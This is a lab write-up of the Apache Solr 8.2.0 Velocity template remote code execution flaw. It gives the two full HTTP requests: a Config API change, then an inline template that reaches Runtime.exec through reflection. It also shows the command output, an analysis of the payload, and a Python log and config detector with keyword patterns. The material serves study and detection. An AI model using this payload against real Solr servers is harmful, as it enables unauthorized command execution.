References:
https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/gistfile1.txt
https://lucene.apache.org/solr/guide/8_2/config-api.html
https://archive.apache.org/dist/lucene/solr/8.2.0/solr-8.2.0.zip
0x01 Environment setup

Start Solr 8.2.0 on port 8983 and create a test core named test111 (Windows):

C:\solr-8.2.0\bin
λ solr.cmd start -p 8983
Java HotSpot(TM) 64-Bit Server VM warning: JVM cannot use large page memory because it does not have enough privilege to lock pages in memory.
Unable to get Charset 'cp65001' for property 'sun.stderr.encoding', using default GBK and continuing.
Waiting up to 30 to see Solr running on port 8983
Started Solr server on port 8983. Happy searching!

C:\solr-8.2.0\bin
λ solr.cmd create -c test111
WARNING: Using _default configset with data driven schema functionality. NOT RECOMMENDED for production use.
         To turn off: bin\solr config -c test111 -p 8983 -action set-user-property -property update.autoCreateFields -value false
Unable to get Charset 'cp65001' for property 'sun.stderr.encoding', using default GBK and continuing.

Created new core 'test111'

C:\solr-8.2.0\bin
0x02 Testing the payload

Send the first request. It uses the Config API (/solr/<core>/config) to define a query response writer named velocity backed by solr.VelocityResponseWriter, with params.resource.loader.enabled set to true. That setting is the whole point of step one: it lets a template be supplied inline in request parameters instead of being read from a file under the core's conf directory.
POST /solr/test111/config HTTP/1.1
Host: solr:8983
Content-Type: application/json
Content-Length: 259

{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}

Response:

HTTP/1.1 200 OK
Content-Type: text/plain;charset=utf-8
Content-Length: 150

{
  "responseHeader":{
    "status":0,
    "QTime":9574},
  "WARNING":"This response format is experimental. It is likely to change in the future."}
Send the second request. With wt=velocity the core renders the template named by v.template, and because the params resource loader is now enabled, the template body itself can be passed in the v.template.custom parameter, so the request carries the whole payload:
GET /solr/test111/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
Host: localhost:8983

Response (the output of id, rendered by the template):

HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Content-Length: 58

0 uid=197608(lzhd24) gid=197121 groups=197121
0x03 Payload analysis

Decoded (the + signs in the GET are URL-encoded spaces), the template is:

#set($x='')
#set($rt=$x.class.forName('java.lang.Runtime'))
#set($chr=$x.class.forName('java.lang.Character'))
#set($str=$x.class.forName('java.lang.String'))
#set($ex=$rt.getRuntime().exec('id'))
$ex.waitFor()
#set($out=$ex.getInputStream())
#foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end

#set($x='') binds an empty java.lang.String. The template cannot import anything, but $x.class is a java.lang.Class, and Class.forName() loads any class by name from there; this is the reflection pivot that makes the rest possible.
$rt, $chr and $str are the Class objects for Runtime, Character and String, so $rt.getRuntime() is the static Runtime.getRuntime() call, and $rt.getRuntime().exec('id') starts the process.
$ex.waitFor() blocks until the process exits and returns its exit code, which Velocity renders into the output; that is the leading 0 in the response body above.
$out is the process's stdout. Velocity has no way to read a byte[], so the #foreach loop iterates $out.available() times, reads one byte per iteration and turns it into a one-character string via Character.toChars() and String.valueOf().
Two caveats follow from that loop: each byte becomes one character, so non-ASCII output is mangled, and because stdout is only drained after waitFor() returns, a command that writes more than the OS pipe buffer will block before exiting and the request will hang.
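Detection for the two-step sequence in 0x02, as an added example (not code from the write-up). Solr's request log only records the request line, so step one (the POST to /solr/<core>/config) is visible only as a Config API write and its body has to be checked from a proxy/WAF log or from the core's current config (GET /solr/<core>/config); step two is fully visible in the URL. The log lines below are constructed in a Jetty/NCSA-style format modelled on the write-up's requests, not real Solr logs, and the severity labels are the example's own.

```python
import json
import re
import urllib.parse

# Constructed sample lines: the two requests from the write-up plus two benign
# queries. The format is NCSA-style; real request-log layouts vary.
SAMPLE_LOG = """\
127.0.0.1 - - [10/Nov/2019:12:00:01 +0800] "POST /solr/test111/config HTTP/1.1" 200 150
127.0.0.1 - - [10/Nov/2019:12:00:05 +0800] "GET /solr/test111/select?q=1&wt=velocity&v.template=custom&v.template.custom=%23set(%24x%3D%27%27)%23set(%24rt%3D%24x.class.forName(%27java.lang.Runtime%27)) HTTP/1.1" 200 58
127.0.0.1 - - [10/Nov/2019:12:00:09 +0800] "GET /solr/test111/select?q=*:*&wt=json HTTP/1.1" 200 412
127.0.0.1 - - [10/Nov/2019:12:00:12 +0800] "GET /solr/test111/select?q=*:*&wt=velocity&v.template=browse HTTP/1.1" 200 9000
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
HANDLER_RE = re.compile(r"^/solr/(?P<core>[^/]+)/(?P<handler>config|select)/?$")
# Strings that only appear when a template is driving the JVM, not a search.
DANGEROUS_TOKENS = ("class.forName", "getRuntime", ".exec(", "ProcessBuilder")


def analyze_request(method: str, target: str):
    """Return (severity, core, reason) for one request, or None if uninteresting."""
    url = urllib.parse.urlsplit(target)
    m = HANDLER_RE.match(url.path)
    if not m:
        return None
    core, handler = m.group("core"), m.group("handler")
    params = urllib.parse.parse_qs(url.query, keep_blank_values=True)

    if handler == "config" and method == "POST":
        # The access log has no body; whether this is the step-one
        # update-queryresponsewriter change must be confirmed elsewhere.
        return ("medium", core, "Config API write; inspect body / current config")

    if handler == "select" and params.get("wt", [""])[0] == "velocity":
        # v.template=<name> picks a template; v.template.<name>=... supplies one inline.
        inline = {k: "".join(v) for k, v in params.items() if k.startswith("v.template.")}
        if not inline:
            return ("low", core, "velocity writer with a file-based template")
        for name, tmpl in inline.items():
            if any(tok in tmpl for tok in DANGEROUS_TOKENS):
                return ("high", core, f"inline template {name} calls into the JVM")
        return ("medium", core, "inline Velocity template supplied in request parameters")
    return None


def scan_log(text: str) -> list:
    """Run analyze_request over every parsable line, keeping findings in log order."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        hit = analyze_request(m.group("method"), m.group("target"))
        if hit:
            findings.append((m.group("ts"),) + hit)
    return findings


def config_enables_param_templates(body: str) -> bool:
    """True if a JSON Config API body, or a config dump, switches on the params
    resource loader for a VelocityResponseWriter. The walk does not depend on
    the exact nesting, so it handles both the step-one body and a GET dump."""
    stack = [json.loads(body)]
    while stack:
        node = stack.pop()
        if isinstance(node, dict):
            if (node.get("class") == "solr.VelocityResponseWriter"
                    and str(node.get("params.resource.loader.enabled", "false")).lower() == "true"):
                return True
            stack.extend(node.values())
        elif isinstance(node, list):
            stack.extend(node)
    return False


if __name__ == "__main__":
    for ts, sev, core, why in scan_log(SAMPLE_LOG):
        print(f"{ts} [{sev}] core={core}: {why}")
```

On a live instance the cheaper check is configuration, not logs: pull GET /solr/<core>/config, run it through config_enables_param_templates, and treat any core where the velocity writer has params.resource.loader.enabled=true as already at the end of step one, whether or not a matching POST was ever logged.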